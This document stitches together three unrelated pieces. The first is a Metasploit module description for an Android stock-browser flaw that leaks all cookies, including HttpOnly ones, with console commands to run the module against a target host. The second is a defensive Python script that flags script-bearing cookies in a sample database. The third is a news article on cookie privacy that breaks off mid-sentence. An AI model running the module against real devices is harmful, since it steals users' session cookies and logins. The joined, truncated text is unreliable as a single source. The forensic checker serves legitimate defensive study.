Android Browser "Open in New Tab" Cookie Theft

In Android’s stock AOSP Browser application and WebView component, the “open in new tab” functionality allows a file URL to be opened. On versions of Android before 4.4, the path to the sqlite cookie database could be specified. By saving a cookie containing a <script> tag and then loading the sqlite database into the browser as an HTML file, XSS can be achieved inside the cookie file, disclosing all cookies (HttpOnly or not) to an attacker.

To display the available options, load the module within the Metasploit console and run the commands ‘show options’ or ‘show advanced’:


msf > use auxiliary/gather/android_browser_new_tab_cookie_theft
msf auxiliary(android_browser_new_tab_cookie_theft) > show options
msf auxiliary(android_browser_new_tab_cookie_theft) > set Rhost 192.168.56.1
msf auxiliary(android_browser_new_tab_cookie_theft) > set Rport 4545
msf auxiliary(android_browser_new_tab_cookie_theft) > run
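
A forensic check for the condition described above, as an added example that is not part of the original post or of the Metasploit module: it scans a cookie database for values a browser would parse as markup if the file were rendered as HTML, and lists the HttpOnly cookies stored in the same file. The table layout, column names and sample rows are assumptions constructed for illustration.

```python
import re
import sqlite3

# Assumed, simplified layout for this example; real Android cookie
# databases use different table and column names across versions.
SCHEMA = "CREATE TABLE cookies (host_key TEXT, name TEXT, value TEXT, httponly INTEGER)"

# Constructed sample rows, not taken from a real device.
SAMPLE_ROWS = [
    ("bank.example", "session", "constructed-session-id", 1),
    ("shop.example", "cart", "3 items", 0),
    ("attacker.example", "x", "<script>/* constructed marker */</script>", 0),
    ("news.example", "prefs", "font<12", 0),
]

# "<" followed by a letter, "/", "!" or "?" is where an HTML parser starts
# treating text as markup; a bare "<" before a digit stays plain text.
MARKUP = re.compile(r"<[A-Za-z/!?]")


def build_sample_db(rows=SAMPLE_ROWS):
    db = sqlite3.connect(":memory:")
    db.execute(SCHEMA)
    db.executemany("INSERT INTO cookies VALUES (?, ?, ?, ?)", rows)
    return db


def triage(db):
    """Return (cookies carrying markup, HttpOnly cookies stored beside them)."""
    rows = db.execute(
        "SELECT host_key, name, value, httponly FROM cookies ORDER BY rowid"
    ).fetchall()
    suspicious = [
        (host, name) for host, name, value, _ in rows
        if MARKUP.search(str(name)) or MARKUP.search(str(value))
    ]
    # HttpOnly is only a column in the file: it limits document.cookie, not
    # what becomes readable once the file itself is rendered as a page.
    exposed = [(host, name) for host, name, _, flag in rows if flag] if suspicious else []
    return suspicious, exposed


if __name__ == "__main__":
    flagged, at_risk = triage(build_sample_db())
    print("cookies containing markup:", flagged)
    print("HttpOnly cookies in the same file:", at_risk)
```
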

“They (HTTP cookies) let websites remember you, your website logins and more. But they can also be a treasure trove of private information for hackers,” he said.

Rulindana notes that while most cookies are perfectly safe, guarding online privacy can be overwhelming.

“Some websites are not secure, and this allows hackers to intercept cookies and view the information they carry. Frankly the cookies themselves are not harmful, but because they may carry personal information, it is better to use cookies on sites that are trusted to be secure,” he noted.

What are cookies and what do they do?

In essence, the term cookie refers to information stored by a website on the user’s local browser, said Patricie Nostalgie, a software engineer.

“They are basically used to keep track of visitors. If a user is browsing, the information he sees is stored somewhere in the cloud on a machine that we call Server. So the server has the task of processing the requests received from web browsers and replying back with the information requested,”

“And this takes a lot of resources as one server can be serving thousands of users. So sometimes developers can choose to store some general information on the client side so that when a user visits the website for the second time, he gets the info from his local machine without sending the request to the server,” he added.

What information can they hold?

According to Rulindana, computer cookies normally store private information, including the amount of time a user spends on a particular website, the links a person clicks while using the website, the accounts they log into, and the pages visited, among others.

What happens if you don’t accept a cookie?

The flip side of not accepting cookies is that some companies will not let users access their websites.

Rulindana said, “But for the most part, you will still be able to access the majority of the internet without accepting cookies.”

Commenting on the advantage of accepting cookies, he added, “You will likely get a more tailored experience with more relevant content, so it is usually worth it, unless the user is particularly fearful about privacy.”

Are internet cookies safe?

Under normal circumstances, Nostalgie says that cookies are generally used to improve the experience of users.

But he added that there has been controversy from privacy advocates who would rather not have information about themselves being stored, particularly relating to their browsing habits.

“Cookies are not safe as they are stored in plain text, so it’s not advisable to accept cookies on highly sensitive websites such as those with payment
